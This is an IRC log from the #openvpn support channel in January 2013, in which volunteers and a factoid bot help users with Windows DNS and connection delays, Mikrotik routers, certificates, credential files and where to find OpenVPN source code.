[~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 16:28 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has joined #openvpn 16:28 -!- ade_b [~Ade@koln-4d0b1082.pool.mediaWays.net] has joined #openvpn 16:28 -!- ade_b [~Ade@koln-4d0b1082.pool.mediaWays.net] has quit [Changing host] 16:28 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 16:31 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 16:52 < youssef> hi every one, can someone help me to setup my routing stuff, please i'm getting crazy with this. 16:57 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Ping timeout: 256 seconds] 16:57 -!- bisko [~bisko@178.254.232.159] has quit [Quit: Computer has gone to sleep.] 16:59 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 16:59 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn 17:04 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Ping timeout: 256 seconds] 17:06 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn 17:10 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Ping timeout: 256 seconds] 17:14 < pppingme> SpookZA I don't have ANY routing in openvpn, each side has an ifconfig in the openvpn.conf file (each site runs on a different port, so the center point is actually running multiple openvpn daemons, but each one is incredibly simple in its setup) and thats it, no iroutes or anything else, in terms of openvpn, its about as simple as it gets. 17:18 -!- eugenmayer [~EugenMaye@HSI-KBW-109-193-196-063.hsi7.kabel-badenwuerttemberg.de] has quit [Quit: Leaving.] 17:32 -!- haswelll [~HU@192.73.252.248] has joined #openvpn 17:32 < haswelll> hey 17:33 < haswelll> why is there always a delay of around 1 minute after i connect to vpn before i can browse websites? 17:33 < haswelll> the client goes green but i have to wait ages 17:33 < haswelll> running 2.3 on windows 7 64 17:33 < haswelll> :) 17:34 < haswelll> ./whois haswelll 17:34 -!- haswelll [~HU@192.73.252.248] has quit [Client Quit] 17:34 <+pekster> Check your logs to get an idea of the timeline of your connection attempt 17:35 <+pekster> Or quit before I answer :P 17:37 -!- haswelll [~HU@192.73.252.248] has joined #openvpn 17:37 <+pekster> <+pekster> Check your logs to get an idea of the timeline of your connection attempt 17:37 < haswelll> ok 17:38 < haswelll> client log shows no errors, it takes about 3 seconds to connect and the icon turns green 17:39 <+pekster> Then the VPN is connected. Once you see the 'Initialization Sequence Completed' message, OpenVPN has done everything it has been told 17:40 < haswelll> server log shows same 17:40 < haswelll> down to the second 17:40 < haswelll> i'm guessing this might be some route table issue on windows 17:40 <+pekster> Routes are added before you get that message 17:41 <+pekster> At least if you let openvpn manage them 17:41 < haswelll> then im wondering if it could be a dns thing as i push dns from server 17:41 < haswelll> maybe windows takes some time to adjust 17:41 <+pekster> Probably. DNS is somewhat of a PITA under Windows since it doesn't play well on multi-homed networks 17:42 < haswelll> gonna try setting dns on the adapter and not pushing it 17:42 <+pekster> You can tinker with the --register-dns setting, although that's more of a hack than anything. I developed a custom solution last domain-environmnet where we had split-DNS in order to make sure OpenVPN played nice with the internal DNS setup and warn the user if something went wrong 17:42 <+pekster> Yet another case of Windows not playing nice with others 17:46 < haswelll> if a hack works i'll take it ;) 17:48 -!- HU_ [~HU@180.155.14.35] has joined #openvpn 17:49 -!- HU_ [~HU@180.155.14.35] has quit [Client Quit] 17:51 -!- haswelll [~HU@192.73.252.248] has quit [Ping timeout: 256 seconds] 17:51 -!- haswelll_ [~HU@192.73.252.248] has joined #openvpn 17:51 < haswelll_> didn't help 17:52 < haswelll_> irc auto connects at the exact moment web pages will finally load 17:52 < haswelll_> dont think it's dns thing 17:53 <+pekster> If you can ping your VPN peer by IP then it's not an openvpn thing 17:53 < haswelll_> ach i didnt restart openvpn after removing push dns from server conf 17:53 <+pekster> I wrote an awful lot of code to make DNS "just work" under a Windows enviornmnet. It's non-trivial to diagnose and fix crap like that given how awful the OS is 17:53 < haswelll_> what OS do you use 17:53 <+pekster> Many 17:55 -!- APTX [~APTX@unaffiliated/aptx] has quit [Ping timeout: 248 seconds] 17:57 -!- haswelll_ [~HU@192.73.252.248] has quit [Read error: Connection reset by peer] 17:57 -!- haswelll_ [~HU@192.73.252.248] has joined #openvpn 17:57 < haswelll_> lol 17:57 < haswelll_> this will sound weird but 17:58 < haswelll_> now its instant, but only after i let it use blowfish 17:58 < haswelll_> had it set to aes 17:58 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn 17:58 < haswelll_> doesn't make any sense 17:58 < wh1p> isnt blowfish an irc plugin? 17:59 < haswelll_> default cipher if u dont specify one in your configs 17:59 < dioz> http://en.wikipedia.org/wiki/Blowfish_(cipher) 17:59 < haswelll_> supposedly a bit faster than aes in general but doesnt explain why it gets rid of the delay 17:59 < haswelll_> before i couldn't even ping 10.8.0.1 until after 60 seconds 18:00 < haswelll_> and i have an i5 with aes instructions 18:01 <+pekster> That probably dones't actually matter since the official builds are backwards-compatable with far older chipsets 18:01 <+pekster> Unless you're passing hardware crypto options 18:02 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has left #openvpn ["Leaving"] 18:02 < haswelll_> unless that happens magically behind the scenes, im not 18:05 -!- mrebola [~cesar@187.245.157.97] has joined #openvpn 18:05 -!- mrebola [~cesar@187.245.157.97] has left #openvpn [] 18:10 < haswelll_> im thinking it might be a bug 18:10 < haswelll_> happens also on my laptop 18:13 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Read error: Operation timed out] 18:13 -!- kenyon [kenyon@darwin.kenyonralph.com] has quit [Read error: Operation timed out] 18:14 -!- black_ [black@got.laid.using.blackmajic.org] has quit [Read error: Operation timed out] 18:14 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Read error: Operation timed out] 18:16 -!- hazardous [~dbn@2001:470:8932:6855:4185::fe80] has joined #openvpn 18:17 -!- blackmagic [black@got.laid.using.blackmajic.org] has joined #openvpn 18:17 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 18:17 -!- kenyon [kenyon@darwin.kenyonralph.com] has joined #openvpn 18:20 -!- APTX [~APTX@unaffiliated/aptx] has quit [Remote host closed the connection] 18:23 -!- haswelll_ [~HU@192.73.252.248] has quit [Quit: Leaving] 18:32 -!- JackWinter [~jack@vodsl-4655.vo.lu] has left #openvpn ["Konversation terminated!"] 18:33 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 18:34 -!- JackWinter [~jack@vodsl-4655.vo.lu] has left #openvpn ["Konversation terminated!"] 18:37 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 19:04 -!- p3rror [~mezgani@2001:0:53aa:64c:1c25:7ae9:d673:2d87] has joined #openvpn 19:06 -!- TypoNe [~itsme@195.197.184.87] has quit [Ping timeout: 255 seconds] 19:07 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn 19:08 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 19:11 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn 19:15 -!- APTX [~APTX@unaffiliated/aptx] has quit [Read error: Operation timed out] 19:16 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 19:16 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 19:16 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 19:16 -!- mode/#openvpn [+o krzee] by ChanServ 19:16 <@krzee> [04:31] hi everyone, I am trying to create a small vpn to access the web securely in China. I wanted to ask if I can use openvpn via https? 19:16 <@krzee> [04:40] Yes you can, use tcp and port 443 19:16 <@krzee> ak5_, i dont think that is true anymore ^ 19:17 <@krzee> !obs 19:17 <@krzee> !ping 19:17 <@vpnHelper> pong 19:17 <@krzee> !factoids 19:17 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 19:17 <@krzee> !obfs 19:17 <@vpnHelper> "obfs" is (#1) if you are looking to obfuscate your traffic to get through a firewall that recognizes and blocks openvpn, try using this proxy: obfsproxy https://www.torproject.org/projects/obfsproxy.html.en or (#2) http://community.openvpn.net/openvpn/wiki/TrafficObfuscation 19:19 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn 19:24 <@krzee> dazo said "Please misunderstand me correctly ... I do like the idea of obfuscation in OpenVPN." 19:24 <@krzee> lol i like the wording :D 19:25 -!- p3rror [~mezgani@2001:0:53aa:64c:1c25:7ae9:d673:2d87] has quit [Ping timeout: 245 seconds] 19:29 -!- hazardous [~dbn@2001:470:8932:6855:4185::fe80] has left #openvpn [] 19:30 -!- hazardous [~dbn@2001:470:8932:6855:4185::fe80] has joined #openvpn 19:32 -!- blackmagic [black@got.laid.using.blackmajic.org] has quit [Ping timeout: 246 seconds] 20:24 -!- u0m3 [~Radu@109.96.140.34] has quit [Read error: Connection reset by peer] 20:50 -!- u0m3 [~Radu@109.96.140.34] has joined #openvpn 21:17 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has quit [Read error: Connection reset by peer] 21:29 -!- Cpt-Oblivious is now known as mynewnick 21:29 -!- mynewnick is now known as Cpt-Oblivious 21:34 -!- denon [~denon@unaffiliated/denon] has joined #openvpn 21:35 < denon> anyone awake with experience using openvpn on Mikrotik? 21:38 < denon> seems pretty much stock, just doesnt do client cert .. only user/pass .. 21:45 <+pekster> denon: OpenVPN in a stock build suports SSL/TLS connections; it's possible to perform a build that lacks that support, but I don't see why anyone would want that 21:50 -!- jthunder_ [~jthunder@174.3.126.51] has joined #openvpn 21:51 -!- jthunder_ [~jthunder@174.3.126.51] has quit [Client Quit] 21:52 < denon> pekster: yeah, Im not entirely sure I understand their implementation yet 21:52 <+pekster> I've run openvpn on the OpenWRT platform with wonderful results 21:53 < denon> well, this is a nice 30-some core box with 12 interfaces LACP'd to various spots in the network, I'd prefer not to add another appliance 21:54 -!- jthunder [~jthunder@174.3.126.51] has quit [Ping timeout: 252 seconds] 21:54 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 21:57 <+pekster> Oh, I'm not familiar with that device 21:58 <+pekster> Some quick searching online revelaed that company also makes routers, so I assumed a low-end embedded-style system 21:58 <+pekster> Ultimately it comes down to how the program was compiled. If it wasn't built with a certain support, it won't work. Pretty basic ;) 21:59 -!- mode/#openvpn [+v denon] by krzee 22:02 <@krzee> denon, if you want l/p 22:02 <@krzee> !authpass 22:03 <@vpnHelper> "authpass" is (#1) please see --auth-user-pass-verify in the manual to learn how to force clients to use passwords in addition to certs or (#2) or to ONLY use passwords (no certs, highly NOT recommended) also use --client-cert-not-required or (#3) and if you want the login name to be used as the common-name for things like ccd entries, use --username-as-common-name 22:06 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder] 22:08 <@krzee> !pki 22:08 <@vpnHelper> "pki" is (#1) http://openvpn.net/index.php/open-source/documentation/howto.html#pki for how to make your PKI stuff (ca, and certs) or (#2) Heres a basic rundown of how it works... The server, client, and ca certs are all signed by the same ca.key. The server and client use the ca.crt to check that eachother were signed by the right ca.key. Optionally, the client also checks that the server cert was 22:08 <@vpnHelper> signed specially as a server (see !servercert) 22:08 <@krzee> ^ denon, if you use easy-rsa you can follow link #1 22:08 <@krzee> personally i use:L 22:08 <@krzee> !ssl-admin 22:08 <@vpnHelper> "ssl-admin" is (#1) if you use freebsd, it is in ports or (#2) svn co https://www.secure-computing.net/svn/trunk/ssl-admin to grab it from svn or (#3) A perl script for managing SSL certificates (being a CA). Makes a good replacement for easy-rsa 22:09 <+pekster> Well, if the gadget he's using supports it. You can do ./configure --disable-ssl when performing a build 22:09 <+pekster> I don't know if he means the frontend doesn't support it, or the program itself 22:09 <@krzee> [19:53] well, this is a nice 30-some core box with 12 interfaces LACP'd to various spots in the network, I'd prefer not to add another appliance 22:10 <+denon> you dont get direct access to it, it's wrapped in their OS shell and gui 22:10 <@krzee> just so you know, openvpn is single threaded and will only use 1 core 22:10 <+denon> krzee: pretty sure they spin up new threads per vpn instance 22:10 <@krzee> wrong 22:11 <+denon> no, I mean pretty sure mikrotik does ... you can run several instances which are totally different versions afaik 22:11 <+denon> I assumed it was isolated daemons, configs, etc 22:12 <+pekster> Per instance, yes, it's a separate process (not a thread, to clarify; one instance = one process = one thread) 22:12 <@krzee> ^^ 22:12 <@krzee> 'but i highly doubt they do that, unless they havnt updated since openvpn version 1 22:12 <@krzee> lol 22:13 <@krzee> denon, it would also be a different socket per instance 22:13 <@krzee> ip:port 22:13 <+denon> yeah 22:13 <@krzee> if they use the same socket, they use the same thread 22:14 <@krzee> (with openvpn) 22:14 <+denon> yeah, they have the facility to run different configs on different vlans/etc, so diffrent socket of course 22:14 <+denon> anyway, I dont much care how it works in their end at the moment :) 22:14 <@krzee> unless magically retarded firewall rules redirect or something, but that would be too insane 22:14 <+pekster> Yet don't support X509 cets? Seems really stupid to me 22:15 <@krzee> i bet it does support certs 22:15 <@krzee> ild bet he just needs to figure out how 22:15 <@krzee> unfortunately ive never even heard of what hes using 22:15 <+denon> well, I was looking at some old documentation that stated that .. I'm trying to figure out how it really works yes 22:15 <+pekster> We can help you with the actual config openvpn uses; we (generally) don't deal with supporting goofy frontends (see your app mfgr if you need that) 22:18 -!- b1rkh0ff [~b1rkh0ff@109.163.158.168] has quit [Ping timeout: 252 seconds] 22:19 -!- b1rkh0ff [~b1rkh0ff@31.176.152.170] has joined #openvpn 22:19 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds] 22:20 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 22:20 -!- mode/#openvpn [+o krzee] by ChanServ 22:21 <+denon> krzee: get off the dialup man :) 22:22 <+pekster> Or just sign up for your free year of AWS t1.micro 24/7 cloud usage (if you're a new user 22:22 <@krzee> this router is about to die 22:22 <@krzee> good thing i bought another, just gotta go replace 22:23 <@krzee> getting heavy packet loss to the router itself, lol 22:23 < hazardous> krzee: http://www.ubnt.com/edgemax 22:23 <@vpnHelper> Title: EdgeMAX | Ubiquiti Networks, Inc. (at www.ubnt.com) 22:23 < hazardous> ever use one of these 22:23 <@krzee> man im in the mountains 22:23 <@krzee> lucky im even online 22:23 < hazardous> it supports openvpn ok 22:23 <+pekster> My poor *wrt (the one with 16M RAM) recently put up with ~3k conntrack states when I restarted my rtorrent after it crashed late last week 22:23 <+denon> krzee: http://routerboard.com/CCR1036-12G-4S 22:23 <@vpnHelper> Title: RouterBoard.com : CCR1036-12G-4S (at routerboard.com) 22:23 <+denon> 36 core, 24 million pps 22:24 <+denon> 16Gbit wire speed 22:24 <+denon> kiss your wrt54g goodbye ;) 22:24 <+pekster> denon: Why not run openpvn on a more suitaable device behind this thing? Then you could edit your config directly? 22:24 <+denon> pekster: because all the real vpn traffic comes into other devices, this is just for some niche stuff 22:25 <@krzee> hazardous, i have not, but im a fan of ubiquiti 22:25 <+denon> yeah, mikrotik and ubiquiti go hand in hand 22:26 <+denon> ubiq is more suited toward CPE and wireless side though 22:26 <+denon> mikrotik is more designed for core and edge, good for wisp work 22:26 <@krzee> cant you get under the hood? 22:26 <+denon> hazardous: btw, unless I missed it, edgemax still isnt out 22:26 <@krzee> to the cli? 22:27 <+denon> vaporware 22:27 <+denon> krzee: the cli is their cli 22:27 <+denon> and it looks like it does support client certs, old documentation from ages ago threw me 22:27 <@krzee> is that a riddle? 22:27 <+denon> it's an IOS style cli 22:27 <+denon> not a bash shell with filesystem access 22:27 <@krzee> werd 22:28 <+denon> it handles a lot of packets and a lot of routing protocols pretty well 22:28 <+denon> which is the main goal usually 22:28 <@krzee> so does my dual core freebsd router 22:28 <@krzee> :D 22:28 <+denon> you can do 24M PPS on your fbsd router? :) 22:29 <@krzee> no idea, my weak ass 3rd world connection would piss itself WAYYYYYYYY earlier 22:29 <+denon> (I like fbsd as much as the next guy, dont get me wrong..) 22:29 <+denon> hehe 22:30 <@krzee> you know, our friend got me into freebsd long long ago 22:30 <+denon> uh huh, ask him who got him into fbsd .. 22:30 <@krzee> no shit? 22:30 <+denon> :) 22:30 <@krzee> werd 22:30 <+denon> it's a small world 22:30 <@krzee> so you indirectly got me into fbsd 22:31 <+denon> sorry 22:31 <@krzee> :-p 22:31 -!- youssef [~youssef@ip-83-134-156-208.dsl.scarlet.be] has quit [Remote host closed the connection] 22:32 <+denon> then again, that's like saying Al Gore got me into routing 22:33 <+pekster> You sure it wasn't senator what's-his-name that showed us all about the tubes? :P 22:34 <@krzee> al invented the tubes 22:34 <+denon> ted stevens 22:34 < EugeneKay> I prefer the dump truck model 22:34 <+denon> http://en.wikipedia.org/wiki/Series_of_tubes 22:34 <@vpnHelper> Title: Series of tubes - Wikipedia, the free encyclopedia (at en.wikipedia.org) 22:35 <+denon> in reality, it's more like a conveyor belt, with the occasional broken spindle 22:38 <@krzee> internet is a series of win tubes 22:38 <@krzee> just said on another network 22:39 <@krzee> (not because of me) 22:39 <+denon> it's intuitive.. 22:39 <+pekster> The Internet is like a series of self-managed IP routers and autonomous systems operating together for a common purpose. Oh, wait... 22:39 <+denon> "operating together"... 22:39 <+denon> yeah, that'd be nice 22:40 <+pekster> To be fair, "most" devices to IP reasonably correctly. Mostly. 22:40 <+pekster> do* 22:40 <+denon> pekster, meet Cogent :) 22:40 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 22:40 <@krzee> LOL 22:41 <+denon> well, my laptop has just informed me it's been a long day, and I'm down to 14% battery, probably time to wrap up for the evening.. 22:41 <+pekster> In 30 years I wonder what regrets we'll have over IPv6 design decisions 22:41 <@krzee> werd, gnite man, good to see ya 22:41 <@krzee> 30 years? 22:41 <+denon> thin client on the other hand has lots of power.. but then again, no good without my laptop to see the other side'a things 22:41 * denon mumbles 22:42 <+denon> pekster: you're assuming we'll have actually implemented ipv6 instead of just tunneling and extending 4? 22:42 <+denon> take it easy, gnite 22:42 * denon out 22:42 <+pekster> heh, night 22:44 <@krzee> why wait so long to start with the regrets? 22:46 <+pekster> Pesumably we'll get more as new protocols and designs are born that IPvX doesn't handle well 22:46 <+pekster> The framers of v4 never envisioned the use we have today with p2p, streaming video, such huge uptake and demand for unique IPs, etc 22:50 < pppingme> pekster we will be on ipv8 by then 22:52 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 244 seconds] 23:54 -!- kernelPiCNic [~skyroveRR@unaffiliated/tarzach] has joined #openvpn 23:54 < kernelPiCNic> Hello, I am using openvpn along with vpnbook on a single machine http://www.vpnbook.com/ should I use openvpn as a server or as a client? THey already provided me the username and password. 23:54 <@vpnHelper> Title: VPNBook | 100% Free VPN Service - OpenVPN and PPTP (at www.vpnbook.com) 23:58 <+pekster> If you're using someone else's service you should get your config file from them since options must match on both peers for encryption and other configurations 23:59 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 23:59 <+pekster> If you're connecting to a peer that is a multi-client supporting server, you need to be configured as a client, obviously 23:59 <+pekster> Also: 23:59 <+pekster> !provider 23:59 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team. --- Day changed Sun Jan 27 2013 00:00 < kernelPiCNic> well, they simply have the username, password on their website http://www.vpnbook.com/ and there is a zip file I downloaded from them, it only has a crt file and a .ovpn file 00:00 <@vpnHelper> Title: VPNBook | 100% Free VPN Service - OpenVPN and PPTP (at www.vpnbook.com) 00:02 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 00:04 <+pekster> The .ovpn file is the config file 00:06 < kernelPiCNic> ok 00:07 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Remote host closed the connection] 00:07 < kernelPiCNic> and what about the crt file? is it ca crt or just client crt? 00:07 <+pekster> I have no clue since I am not your provider 00:07 < kernelPiCNic> ok. 00:07 <+pekster> If you wish to learn how openvpn works, start here: 00:07 <+pekster> !howto 00:07 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 00:07 < kernelPiCNic> I'll check that. 00:16 -!- ak5_ [~ak5@unaffiliated/ak5] has quit [Remote host closed the connection] 00:24 -!- kernelPiCNic [~skyroveRR@unaffiliated/tarzach] has left #openvpn [] 01:10 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 01:10 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 01:10 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 01:10 -!- mode/#openvpn [+o krzee] by ChanServ 01:26 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 01:29 -!- jthunder [~jthunder@174.3.126.51] has quit [Client Quit] 01:29 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Ping timeout: 255 seconds] 01:49 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 256 seconds] 02:05 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn 02:06 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn 02:14 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Excess Flood] 02:15 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn 02:20 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Ping timeout: 252 seconds] 02:54 -!- brute11k [~brute11k@89.249.230.213] has joined #openvpn 03:05 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 03:17 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn 03:25 -!- andi [~andi@unaffiliated/fr00d] has joined #openvpn 03:25 < andi> Hello 03:26 < andi> I have an openvpn tunnel for which I need username and password. I put them into a file which I give as parameter to auth-user-pass. After that I secured the file with chmod 0600. 03:26 < andi> After a while the tunnel is breaking down and I'm getting the error: ERROR: could not read Auth username from stdin 03:27 < andi> Why is openvpn looking for the username and password at stdin when I think the openvpn server goes away or my internet connection is restarted? 03:27 < andi> The openvpn version I'm using is 2.2.2. 03:30 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 03:31 < andi> Ah, I think this is the problem: http://community.openvpn.net/openvpn/ticket/225 03:31 <@vpnHelper> Title: #225 ('--auth-user-pass FILE' and '--auth-nocache' problem) – OpenVPN Community (at community.openvpn.net) 03:32 < andi> I tried to comment out auth-nocache to check if this works when openvpn runs in the negotiation timeout. 03:56 -!- bisko [~bisko@178.254.232.159] has joined #openvpn 04:05 -!- bisko [~bisko@178.254.232.159] has quit [Quit: Textual IRC Client: www.textualapp.com] 04:15 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 255 seconds] 04:21 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 04:37 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 04:38 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Read error: Operation timed out] 04:56 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 245 seconds] 04:58 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn 04:58 -!- zz_AsadH is now known as AsadH 04:58 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 04:58 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 05:02 -!- bisko [~bisko@178.254.232.159] has joined #openvpn 05:24 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 05:50 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 05:55 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 06:03 -!- hazardous [~dbn@2001:470:8932:6855:4185::fe80] has quit [Ping timeout: 245 seconds] 06:03 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Quit: Konversation terminated!] 06:11 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 256 seconds] 06:13 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:18 -!- hazardous [~dbn@2001:470:8932:6855:4185::fe80] has joined #openvpn 06:31 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has joined #openvpn 06:36 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 244 seconds] 06:37 -!- bisko [~bisko@178.254.232.159] has quit [Read error: Operation timed out] 06:52 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 06:59 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 07:36 -!- JackWinter [~jack@vodsl-4655.vo.lu] has left #openvpn ["Konversation terminated!"] 07:38 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 07:40 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 08:01 < Eagleman> How do you suggest storing credentials secure for auto connecting ? 08:04 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has left #openvpn ["Leaving"] 08:06 < kisom> Eagleman: Full disk encryption. 08:09 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 08:21 -!- p3rror [~mezgani@2001:0:53aa:64c:3468:555a:d673:d5e1] has joined #openvpn 08:25 < jackbrown> HOW CAN I CHECK 100% when I'M behind a VPN with openVPN that my real connection will not be used and my real IP will be not detected ? 08:26 < Eagleman> what is my ip 08:27 < Eagleman> should be something different then normal when using redirect gateway 08:57 -!- vpopov [~happylife@149.62.17.217] has joined #openvpn 09:10 < Eagleman> kisom, its a server, so i doubnt full disk encryption will work 09:12 -!- p3rror [~mezgani@2001:0:53aa:64c:3468:555a:d673:d5e1] has quit [Ping timeout: 245 seconds] 09:13 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 09:35 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 09:50 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: bbl] 10:05 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has joined #openvpn 10:09 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn 10:10 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Remote host closed the connection] 10:14 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 10:18 -!- b1rkh0ff [~b1rkh0ff@31.176.152.170] has quit [Ping timeout: 245 seconds] 10:19 -!- b1rkh0ff [~b1rkh0ff@109.163.163.189] has joined #openvpn 10:24 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 10:24 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 10:24 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 10:25 -!- mode/#openvpn [+o krzee] by ChanServ 10:26 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:41 -!- DrCode_ [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 10:42 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 10:42 -!- DrCode_ is now known as DrCode 10:50 -!- n2deep_ [n2deep@odin.sdf-eu.org] has quit [Quit: Lost terminal] 10:53 -!- irksome [~root@host-92-20-171-234.as13285.net] has joined #openvpn 10:54 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Ping timeout: 240 seconds] 10:56 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn 10:57 < irksome> hi. Is the openVPN connect client source available? Or is it just the server? 11:01 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 240 seconds] 11:01 -!- Orbi [~opera@anon-184-212.vpn.ipredator.se] has joined #openvpn 11:02 -!- APTX [~APTX@unaffiliated/aptx] has quit [Remote host closed the connection] 11:07 <@krzee> irksome, openvpn connect is not opensource 11:07 <@krzee> community openvpn is 11:10 < irksome> ok thanks. Do you know if there are any open source windows clients available? (or a command line one that I could create a wrapper for...) 11:10 <@krzee> !download 11:10 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 11:10 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 11:10 <@krzee> #1 11:10 <@krzee> that is community openvpn ^ 11:10 <@krzee> (what we support here) 11:11 <@krzee> and since you want source: 11:11 <@krzee> !git 11:11 <@vpnHelper> "git" is (#1) For the stable git tree: git clone git://openvpn.git.sourceforge.net/gitroot/openvpn/openvpn.git or (#2) For the development git tree: git clone git://openvpn.git.sourceforge.net/gitroot/openvpn/openvpn-testing.git or (#3) Browse the git repositories here: http://openvpn.git.sourceforge.net/git/gitweb-index.cgi or (#4) See !git-doc how to use git 11:11 <@krzee> (in case you want most up to date code) 11:14 < irksome> ok thanks. 11:16 < irksome> the fact that there is a seperate client for download made me think there were two different bits of software. I understand now. 11:18 <@krzee> ya the open source version uses the same install for client or server depending on config 11:19 <@krzee> the $$ version has seperate client and server 11:19 <@krzee> !as 11:19 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 11:19 <@krzee> thats the $ version, comes with support and makes setups REALLY easy 11:20 <@krzee> or thats the goal… i havnt actually used it 11:23 < irksome> I'm just trying to learn about vpns at the 